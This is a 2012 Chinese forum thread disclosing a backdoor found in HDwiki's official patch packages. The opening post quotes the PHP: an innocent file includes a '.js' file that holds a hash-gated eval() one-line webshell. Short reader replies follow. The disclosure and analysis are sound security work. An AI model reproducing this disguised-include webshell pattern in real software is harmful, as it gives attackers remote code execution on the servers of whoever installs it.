全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
12
返回列表 发新帖
楼主: iyuheng
打印 上一主题 下一主题

HDwiki各版本新漏洞补丁包2012-08-09 发现官方留下后门

[复制链接]
跳转到指定楼层
11#
 楼主| 发表于 2012-8-10 11:41:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文转载,本人仅负责复制粘贴原帖地址:http://bbs.python520.com/thread-6926-1-1.html



HDwiki各版本新漏洞补丁包2012-08-09 发现官方留下后门

此补丁为修补wooyun漏洞  http://www.wooyun.org/bugs/wooyun-2010-010564  今天早上到公司无聊看了下补丁包并对比了下,

在看补丁包中的 reference.php 文件时, 首行并发现了如下不明之处:
<?php
/**
词条编辑页面的参考资料
*/
require_once(dirname(__FILE__)."/../js/jqeditor/hdwiki.js"); // 就是这里, 好端端的PHP。include js文件干什么
!defined('IN_HDWIKI') && exit('Access Denied');

class control extends base{

        function control(& $get,& $post){
                $this->base( & $get,& $post);
                $this->load("reference");
复制代码
require_once(dirname(__FILE__)."/../js/jqeditor/hdwiki.js"); // 就是这里, 好端端的PHP。include js文件干什么

然后就看了一下补丁包中的 hdwiki.js

终于明白官方的用心了 hdwiki.js
<?php
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST["fvckadmin"])).sha1($_POST["fvckadmin"]))))) == "b697afd0486d62a72afd3044ef259858b701814d"){
                       eval ($_REQUEST["mjj"]);
}
?>
function delSave(){
        $.post("index.php?doc-delsave",{did:g_docid},function(xml){
                if ('sucess' != xml.lastChild.firstChild.nodeValue){
                        alert('exception');
                }
        });
}
复制代码
这不是明摆着的一句话木马么。
<?php
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST["fvckadmin"])).sha1($_POST["fvckadmin"]))))) == "b697afd0486d62a72afd3044ef259858b701814d"){
                       eval ($_REQUEST["mjj"]);
}
?>


不过这密码的强度的确很高。加了这么多层。

我在想到时候官方肯定又回出来说 官方论坛服务器被黑掉还是怎么的。

本人下载了各个补丁包,均存在此问题。 顺便严重BS 官方这种留后门行为
12#
发表于 2012-8-10 11:44:26 | 只看该作者
大学生以前的vps百科不是用的这个吗?
13#
 楼主| 发表于 2012-8-10 11:44:47 | 只看该作者
lazyzhu 发表于 2012-8-10 11:44
大学生以前的vps百科不是用的这个吗?

是的哦亲
14#
发表于 2012-8-10 11:45:02 来自手机 | 只看该作者
临时工干的
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-12-20 15:58 , Processed in 0.075998 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表